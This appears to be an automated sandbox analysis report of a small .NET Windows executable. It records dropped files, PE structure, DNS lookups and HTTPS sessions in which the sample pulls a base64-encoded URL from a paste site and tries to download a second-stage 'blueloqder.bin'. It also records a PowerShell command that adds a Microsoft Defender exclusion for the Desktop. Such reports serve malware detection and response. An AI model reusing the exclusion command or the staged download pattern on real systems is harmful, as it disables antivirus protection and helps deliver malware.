                                                        SHA-256:5701D8B7755B1397EFAFBD1780209755023CAFA1552CC01F3B8B790DD585F094
                                                        SHA-512:71B162F8CEF3B05D3EBD912DE4459E25FBAEB17477C58A951199610C8968E1B61BC11E2566BFC54D48396EA7A22AA6932C6E2F0DF11689154208E628099A3B9F
                                                        Malicious:false
                                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                                        File Type:Mini DuMP crash report, 15 streams, Fri Dec 8 13:36:12 2023, 0x1205a4 type
                                                        Category:dropped
                                                        Size (bytes):354291
                                                        Entropy (8bit):3.491249776647738
                                                        Encrypted:false
                                                        SSDEEP:3072:K1Zyj/AT/VKv3N7CnpiwwRWZ34uEqQ33LMLTgS7rUJ:qZyj/ATd23N7KQwdZ34533LyTgo
                                                        MD5:4C46E621EFC8E7312B6B2C74E11B08D1
                                                        SHA1:FAEC8C1340B1BFEEAA33212B1E5EDA088091C4D5
                                                        SHA-256:904428DD2274C64A7686222D69B665CD7F5323254B95990CD658AB0DA1E47083
                                                        SHA-512:6FB9D7D7D6D7525852428AD979EDD20BA244D8C65FE270C5A88F0D3B05EA4CDEAE1632C58E4CDAA2E958DCC7F8EC31F2CD95DD0A98ADD6CFBBCDE2CAE50A9DDE
                                                        Malicious:false
                                                        Preview:MDMP..a..... .........se............$...............8.......<...0)......$... u..........`.......8...........T............_..............l)..........X+..............................................................................eJ.......+......GenuineIntel............T.............se............................. ..................W... .E.u.r.o.p.e. .S.t.a.n.d.a.r.d. .T.i.m.e.......................................W... .E.u.r.o.p.e. .S.u.m.m.e.r. .T.i.m.e...........................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                                        File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                        Category:dropped
                                                        Size (bytes):8398
                                                        Entropy (8bit):3.699107388598262
                                                        Encrypted:false
                                                        SSDEEP:192:R6l7wVeJnE6bh6YNkSU9hWZgmfZUlpru89b3Ysfy9m:R6lXJE6d6YeSU9hYgmfWf3LfR
                                                        MD5:EE021130E0619847CAAE003BB47D89BB
                                                        SHA1:FF128D497BF081FC57B1D1415105F7FB4F7A50ED
                                                        SHA-256:5D7BFEB744E0601FDDF5C8943BCE07E031909ECBE6382F603BF80BCA8432B632
                                                        SHA-512:7FB31E84D61B285ABBDC3232AAC8E23A655CE604F09D91E53BBF30A80495D4EBE4190C44FEC8FC712A2F1EF73C83B9F0AA4609BD08500F4699B15C79C6E5A80B
                                                        Malicious:false
                                                        Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.9.6.4.<./.P.i.
                                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                        Category:dropped
                                                        Size (bytes):4774
                                                        Entropy (8bit):4.477621725955039
                                                        Encrypted:false
                                                        SSDEEP:48:cvIwWl8zswJg77aI9OZWpW8VYqYm8M4JzrFT+q8v7rDv3LTd:uIjf2I74o7VGJlKfj3LTd
                                                        MD5:B0C8824AEC1E4482D5DA84EC0CD116C1
                                                        SHA1:2E5CD61E3F3069C95CE03DD683EFFCEE936501E7
                                                        SHA-256:57BD0E5D81BAAC0CC8468B2329458BFC40E16BC43FA5CEF1CBB0B378A352F877
                                                        SHA-512:AB737EAF4E168797CD9E81172897CF87BE007CB3FD22B0EF9DDAAEC29C342E4E74E53E2222CD3B0302A4D3CFFD4AF3AC62396374AF07600EB3963574CF7F6BAE
                                                        Malicious:false
                                                        Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="95318" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096
                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                        File Type:data
                                                        Category:modified
                                                        Size (bytes):2220
                                                        Entropy (8bit):5.3333100176685395
                                                        Encrypted:false
                                                        SSDEEP:48:iWSU4y4RQmFoUeWmfgZ9tK8NPryHm7u1iMutgyV/gQUyuV4xk:iLHyIFKL3IZ2KjyGOum/V4O
                                                        MD5:D16370BCAF2189C31F9A71C1712BEFD1
                                                        SHA1:258A5551F11862DC2E23E7A6994C59A12C1EB532
                                                        SHA-256:D3B8B617881D6DD01D1509819ABB8CFEA8CAB9EF9B829A02C90C6A6D2000CB7C
                                                        SHA-512:86530BCDF27CE645D5A5AF1DBF252E32918716B0D22EEC6DB2D4118353D8A503E4EBA876214A2AFDA20B888119350342F0A680C75713ADFEA54D0EF026B7CB61
                                                        Malicious:false
                                                        Preview:@...e.......................X.X.X.....#.).......................P................1]...E.....i.....(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.AutomationL.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices4.................%...K... ...........System.Xml..8..................1...L..U;V.<}........System.Numerics.4.....................@.[8]'.\........System.Data.<...............i..VdqF...|...........System.ConfigurationH................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com
                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                        File Type:ASCII text, with no line terminators
                                                        Category:dropped
                                                        Size (bytes):60
                                                        Entropy (8bit):4.038920595031593
                                                        Encrypted:false
                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                        Malicious:false
                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                                        File Type:MS Windows registry file, NT/2000 or above
                                                        Category:dropped
                                                        Size (bytes):1835008
                                                        Entropy (8bit):4.417049558560347
                                                        Encrypted:false
                                                        SSDEEP:6144:qcifpi6ceLPL9skLmb0moSWSPtaJG8nAgex285i2MMhA20X4WABlGuNf5+:Hi58oSWIZBk2MM6AFBZo
                                                        MD5:CCC797388FC7392A22C17ABC43189CC0
                                                        SHA1:04DE0E4BE6084491F7C6352F2A47544C60C6E18B
                                                        SHA-256:01F60CA188BCEDA99774B41C720BD36E9F8349C14084BC9301F766414C70E2A4
                                                        SHA-512:AF1DF79D212E9D930257D6687AEF0A73E9EDB0AB6E8FEB3CE08790107051E337430BF025C3246AF0CF4523D80E51B7CD0C7D1F7846C75CA1FE7DA0E1F726F62B
                                                        Malicious:false
                                                        Preview:regfE...E....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm.W.x.).................................................................................................................................................................................................................................................................................................................................................L........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                        File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Entropy (8bit):5.175360398735887
                                                        TrID:
                                                        • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                        • Win32 Executable (generic) a (10002005/4) 49.78%
                                                        • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                        • Generic Win/DOS Executable (2004/3) 0.01%
                                                        • DOS Executable Generic (2002/1) 0.01%
                                                        File name:9K25QyJ4hA.exe
                                                        File size:15'872 bytes
                                                        MD5:7e658759b69b246757803baf9f776a60
                                                        SHA1:6e1304c6539500ba0100327ac64858c25639387c
                                                        SHA256:b5858b684b93cec0c56768fda67e721595bdfa7d14dbf45b74abbf686c9b66a2
                                                        SHA512:ef84ad21b1da818c9e10e70e4e82c4ae63cb07a0aeb15c354512af4c99a0ca0a079fcbd22815183e5847abe1cd7824aa09a21a72b8b2c3798840ed02d0e78b2e
                                                        SSDEEP:384:ZgnOsus6BvAAQv/UOgRtr+lxJECoysFwIiiE:ZBsuLpIgQ9Mw5b
                                                        TLSH:8A62075493E88732E97F0B7A4D7752810BB2BA2ADC62CF4D2D88B05E1CA3385471177B
                                                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....&............"...0..2..........JP... ...`....@.. ....................................`................................
                                                        Icon Hash:00928e8e8686b000
                                                        Entrypoint:0x40504a
                                                        Entrypoint Section:.text
                                                        Digitally signed:false
                                                        Imagebase:0x400000
                                                        Subsystem:windows gui
                                                        Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                                        DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                        Time Stamp:0x95FD26BA [Mon Sep 27 22:48:26 2049 UTC]
                                                        TLS Callbacks:
                                                        CLR (.Net) Version:
                                                        OS Version Major:4
                                                        OS Version Minor:0
                                                        File Version Major:4
                                                        File Version Minor:0
                                                        Subsystem Version Major:4
                                                        Subsystem Version Minor:0
                                                        Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                                        Instruction
                                                        jmp dword ptr [00402000h]
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
Name                                 | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT         | 0x0             | 0x0          |
IMAGE_DIRECTORY_ENTRY_IMPORT         | 0x4ff8          | 0x4f         | .text
IMAGE_DIRECTORY_ENTRY_RESOURCE       | 0x6000          | 0x6a0        | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION      | 0x0             | 0x0          |
IMAGE_DIRECTORY_ENTRY_SECURITY       | 0x0             | 0x0          |
IMAGE_DIRECTORY_ENTRY_BASERELOC      | 0x8000          | 0xc          | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG          | 0x4f18          | 0x38         | .text
IMAGE_DIRECTORY_ENTRY_COPYRIGHT      | 0x0             | 0x0          |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR      | 0x0             | 0x0          |
IMAGE_DIRECTORY_ENTRY_TLS            | 0x0             | 0x0          |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG    | 0x0             | 0x0          |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT   | 0x0             | 0x0          |
IMAGE_DIRECTORY_ENTRY_IAT            | 0x2000          | 0x8          | .text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT   | 0x0             | 0x0          |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008          | 0x48         | .text
IMAGE_DIRECTORY_ENTRY_RESERVED       | 0x0             | 0x0          |
Name   | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy             | Characteristics
.text  | 0x2000          | 0x3050       | 0x3200   | False    | 0.504296875     | data      | 5.552858741926838   | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc  | 0x6000          | 0x6a0        | 0x800    | False    | 0.33447265625   | data      | 3.586738052421582   | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0x8000          | 0xc          | 0x200    | False    | 0.044921875     | data      | 0.08153941234324169 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name        | RVA    | Size  | Type                                                                              | Language | Country | ZLIB Complexity
RT_VERSION  | 0x6090 | 0x410 | data                                                                              |          |         | 0.36538461538461536
RT_MANIFEST | 0x64b0 | 0x1ea | XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators |          |         | 0.5489795918367347
DLL         | Import
mscoree.dll | _CorExeMain
Timestamp                          | Source Port | Dest Port | Source IP   | Dest IP
Dec 8, 2023 14:35:52.078845024 CET | 64277       | 53        | 192.168.2.7 | 1.1.1.1
Dec 8, 2023 14:35:52.205636024 CET | 53          | 64277     | 1.1.1.1     | 192.168.2.7
Dec 8, 2023 14:35:53.111895084 CET | 56659       | 53        | 192.168.2.7 | 1.1.1.1
Dec 8, 2023 14:35:53.242748976 CET | 53          | 56659     | 1.1.1.1     | 192.168.2.7
Timestamp                          | Source IP   | Dest IP | Trans ID | OP Code            | Name     | Type           | Class       | DNS over HTTPS
Dec 8, 2023 14:35:52.078845024 CET | 192.168.2.7 | 1.1.1.1 | 0xc86a   | Standard query (0) | paste.fo | A (IP address) | IN (0x0001) | false
Dec 8, 2023 14:35:53.111895084 CET | 192.168.2.7 | 1.1.1.1 | 0x5d30   | Standard query (0) | oshi.at  | A (IP address) | IN (0x0001) | false
Timestamp                          | Source IP | Dest IP     | Trans ID | Reply Code   | Name     | CName | Address        | Type           | Class       | DNS over HTTPS
Dec 8, 2023 14:35:52.205636024 CET | 1.1.1.1   | 192.168.2.7 | 0xc86a   | No error (0) | paste.fo |       | 104.21.70.240  | A (IP address) | IN (0x0001) | false
Dec 8, 2023 14:35:52.205636024 CET | 1.1.1.1   | 192.168.2.7 | 0xc86a   | No error (0) | paste.fo |       | 172.67.140.164 | A (IP address) | IN (0x0001) | false
Dec 8, 2023 14:35:53.242748976 CET | 1.1.1.1   | 192.168.2.7 | 0x5d30   | No error (0) | oshi.at  |       | 5.253.86.15    | A (IP address) | IN (0x0001) | false

• paste.fo
• oshi.at
Session ID | Source IP   | Source Port | Destination IP | Destination Port | PID  | Process
0          | 192.168.2.7 | 49699       | 104.21.70.240  | 443              | 6780 | C:\Users\user\Desktop\9K25QyJ4hA.exe

Timestamp               | Bytes transferred | Direction | Data
2023-12-08 13:35:52 UTC | 74                | OUT       |
    GET /raw/015dbe46ef97 HTTP/1.1
    Host: paste.fo
    Connection: Keep-Alive
2023-12-08 13:35:53 UTC | 811               | IN        |
    HTTP/1.1 200 OK
    Date: Fri, 08 Dec 2023 13:35:53 GMT
    Content-Type: text/plain;charset=UTF-8
    Content-Length: 48
    Connection: close
    Set-Cookie: PHPSESSID=mr0c71g2mgbdah1097u82qd8gi; path=/
    Set-Cookie: token=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT
2023-12-08 13:35:53 UTC | 48                | IN        |
    aHR0cHM6Ly9vc2hpLmF0L3RxSkFjL2JsdWVsb3FkZXIuYmlu
    (base64 of https://oshi.at/tqJAc/blueloqder.bin, the URL requested in the next session)


Session ID | Source IP   | Source Port | Destination IP | Destination Port | PID  | Process
1          | 192.168.2.7 | 49700       | 5.253.86.15    | 443              | 6780 | C:\Users\user\Desktop\9K25QyJ4hA.exe

Timestamp               | Bytes transferred | Direction | Data
2023-12-08 13:35:53 UTC | 77                | OUT       |
    GET /tqJAc/blueloqder.bin HTTP/1.1
    Host: oshi.at
    Connection: Keep-Alive
2023-12-08 13:35:55 UTC | 158               | IN        |
    HTTP/1.1 404 Not Found
    Server: nginx
    Date: Fri, 08 Dec 2023 13:35:55 GMT
    Content-Type: text/html;charset=UTF-8
    Content-Length: 1849
    Connection: close
2023-12-08 13:35:55 UTC | 1849              | IN        |
    <!DOCTYPE html>
    <html lang="en">

    <head>

      <meta charset="utf-8">
      <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
      <meta name="description" content="Secure file sharing. Encrypted server. No logs. TCP and Curl up

The second-stage file referenced by the paste was no longer hosted at analysis time (404 Not Found), so its behaviour is not covered by this report.


Session ID | Source IP   | Source Port | Destination IP | Destination Port | PID  | Process
2          | 192.168.2.7 | 49705       | 104.21.70.240  | 443              | 7544 | C:\Users\user\Desktop\9K25QyJ4hA.exe

Timestamp               | Bytes transferred | Direction | Data
2023-12-08 13:36:02 UTC | 74                | OUT       |
    GET /raw/015dbe46ef97 HTTP/1.1
    Host: paste.fo
    Connection: Keep-Alive
2023-12-08 13:36:02 UTC | 807               | IN        |
    HTTP/1.1 200 OK
    Date: Fri, 08 Dec 2023 13:36:02 GMT
    Content-Type: text/plain;charset=UTF-8
    Content-Length: 48
    Connection: close
    Set-Cookie: PHPSESSID=id88tfml86fgolhrn5cjs8nagv; path=/
    Set-Cookie: token=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT
2023-12-08 13:36:02 UTC | 48                | IN        |
    aHR0cHM6Ly9vc2hpLmF0L3RxSkFjL2JsdWVsb3FkZXIuYmlu
    (base64 of https://oshi.at/tqJAc/blueloqder.bin)


Session ID | Source IP   | Source Port | Destination IP | Destination Port | PID  | Process
3          | 192.168.2.7 | 49706       | 5.253.86.15    | 443              | 7544 | C:\Users\user\Desktop\9K25QyJ4hA.exe

Timestamp               | Bytes transferred | Direction | Data
2023-12-08 13:36:03 UTC | 77                | OUT       |
    GET /tqJAc/blueloqder.bin HTTP/1.1
    Host: oshi.at
    Connection: Keep-Alive
2023-12-08 13:36:04 UTC | 158               | IN        |
    HTTP/1.1 404 Not Found
    Server: nginx
    Date: Fri, 08 Dec 2023 13:36:04 GMT
    Content-Type: text/html;charset=UTF-8
    Content-Length: 1849
    Connection: close
2023-12-08 13:36:04 UTC | 1849              | IN        |
    <!DOCTYPE html>
    <html lang="en">

    <head>

      <meta charset="utf-8">
      <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
      <meta name="description" content="Secure file sharing. Encrypted server. No logs. TCP and Curl up


Session ID | Source IP   | Source Port | Destination IP | Destination Port | PID  | Process
4          | 192.168.2.7 | 49708       | 104.21.70.240  | 443              | 7964 | C:\Users\user\Desktop\9K25QyJ4hA.exe

Timestamp               | Bytes transferred | Direction | Data
2023-12-08 13:36:10 UTC | 74                | OUT       |
    GET /raw/015dbe46ef97 HTTP/1.1
    Host: paste.fo
    Connection: Keep-Alive
2023-12-08 13:36:10 UTC | 809               | IN        |
    HTTP/1.1 200 OK
    Date: Fri, 08 Dec 2023 13:36:10 GMT
    Content-Type: text/plain;charset=UTF-8
    Content-Length: 48
    Connection: close
    Set-Cookie: PHPSESSID=j4cf8ktta3rsk22nkgk2cdc42u; path=/
    Set-Cookie: token=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT
2023-12-08 13:36:10 UTC | 48                | IN        |
    aHR0cHM6Ly9vc2hpLmF0L3RxSkFjL2JsdWVsb3FkZXIuYmlu
    (base64 of https://oshi.at/tqJAc/blueloqder.bin)


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                        5 | 192.168.2.7 | 49710 | 5.253.86.15 | 443 | 7964 | C:\Users\user\Desktop\9K25QyJ4hA.exe
                                                        Timestamp | Bytes transferred | Direction | Data
                                                        2023-12-08 13:36:11 UTC | 77 | OUT | GET /tqJAc/blueloqder.bin HTTP/1.1
                                                        Host: oshi.at
                                                        Connection: Keep-Alive
                                                        2023-12-08 13:36:12 UTC | 158 | IN | Data Raw: 48 54 54 50 2f 31 2e 31 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 53 65 72 76 65 72 3a 20 6e 67 69 6e 78 0d 0a 44 61 74 65 3a 20 46 72 69 2c 20 30 38 20 44 65 63 20 32 30 32 33 20 31 33 3a 33 36 3a 31 32 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 31 38 34 39 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 0d 0a
                                                        Data Ascii: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 08 Dec 2023 13:36:12 GMTContent-Type: text/html;charset=UTF-8Content-Length: 1849Connection: close
                                                        2023-12-08 13:36:12 UTC | 1849 | IN | Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 0a 3c 68 65 61 64 3e 0a 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 53 65 63 75 72 65 20 66 69 6c 65 20 73 68 61 72 69 6e 67 2e 20 45 6e 63 72 79 70 74 65 64 20 73 65 72 76 65 72 2e 20 4e 6f 20 6c 6f 67 73 2e 20 54 43 50 20 61 6e 64 20 43 75 72 6c 20 75 70
                                                        Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"> <meta name="description" content="Secure file sharing. Encrypted server. No logs. TCP and Curl up


                                                        Target ID:0
                                                        Start time:14:35:50
                                                        Start date:08/12/2023
                                                        Path:C:\Users\user\Desktop\9K25QyJ4hA.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:C:\Users\user\Desktop\9K25QyJ4hA.exe
                                                        Imagebase:0x6c0000
                                                        File size:15'872 bytes
                                                        MD5 hash:7E658759B69B246757803BAF9F776A60
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:.Net C# or VB.NET
                                                        Reputation:low
                                                        Has exited:true

                                                        Target ID:2
                                                        Start time:14:35:51
                                                        Start date:08/12/2023
                                                        Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:powershell" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop
                                                        Imagebase:0x530000
                                                        File size:433'152 bytes
                                                        MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:.Net C# or VB.NET
                                                        Reputation:high
                                                        Has exited:true

                                                        Target ID:3
                                                        Start time:14:35:51
                                                        Start date:08/12/2023
                                                        Path:C:\Windows\System32\conhost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                        Imagebase:0x7ff75da10000
                                                        File size:862'208 bytes
                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high
                                                        Has exited:true

                                                        Target ID:7
                                                        Start time:14:35:54
                                                        Start date:08/12/2023
                                                        Path:C:\Windows\SysWOW64\WerFault.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 6780 -s 2440
                                                        Imagebase:0x2a0000
                                                        File size:483'680 bytes
                                                        MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:.Net C# or VB.NET
                                                        Reputation:high
                                                        Has exited:true

                                                        Target ID:18
                                                        Start time:14:36:00
                                                        Start date:08/12/2023
                                                        Path:C:\Users\user\Desktop\9K25QyJ4hA.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:"C:\Users\user\Desktop\9K25QyJ4hA.exe"
                                                        Imagebase:0x2a0000
                                                        File size:15'872 bytes
                                                        MD5 hash:7E658759B69B246757803BAF9F776A60
                                                        Has elevated privileges:false
                                                        Has administrator privileges:false
                                                        Programmed in:.Net C# or VB.NET
                                                        Reputation:low
                                                        Has exited:true

                                                        Target ID:19
                                                        Start time:14:36:00
                                                        Start date:08/12/2023
                                                        Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:powershell" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop
                                                        Imagebase:0x530000
                                                        File size:433'152 bytes
                                                        MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                        Has elevated privileges:false
                                                        Has administrator privileges:false
                                                        Programmed in:.Net C# or VB.NET
                                                        Reputation:high
                                                        Has exited:true

                                                        Target ID:20
                                                        Start time:14:36:00
                                                        Start date:08/12/2023
                                                        Path:C:\Windows\System32\conhost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                        Imagebase:0x7ff75da10000
                                                        File size:862'208 bytes
                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                        Has elevated privileges:false
                                                        Has administrator privileges:false
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high
                                                        Has exited:true

                                                        Target ID:23
                                                        Start time:14:36:04
                                                        Start date:08/12/2023
                                                        Path:C:\Windows\SysWOW64\WerFault.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 7544 -s 2408
                                                        Imagebase:0x2a0000
                                                        File size:483'680 bytes
                                                        MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                        Has elevated privileges:false
                                                        Has administrator privileges:false
                                                        Programmed in:.Net C# or VB.NET
                                                        Reputation:high
                                                        Has exited:true

                                                        Target ID:24
                                                        Start time:14:36:08
                                                        Start date:08/12/2023
                                                        Path:C:\Users\user\Desktop\9K25QyJ4hA.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:"C:\Users\user\Desktop\9K25QyJ4hA.exe"
                                                        Imagebase:0x920000
                                                        File size:15'872 bytes
                                                        MD5 hash:7E658759B69B246757803BAF9F776A60
                                                        Has elevated privileges:false
                                                        Has administrator privileges:false
                                                        Programmed in:.Net C# or VB.NET
                                                        Reputation:low
                                                        Has exited:true

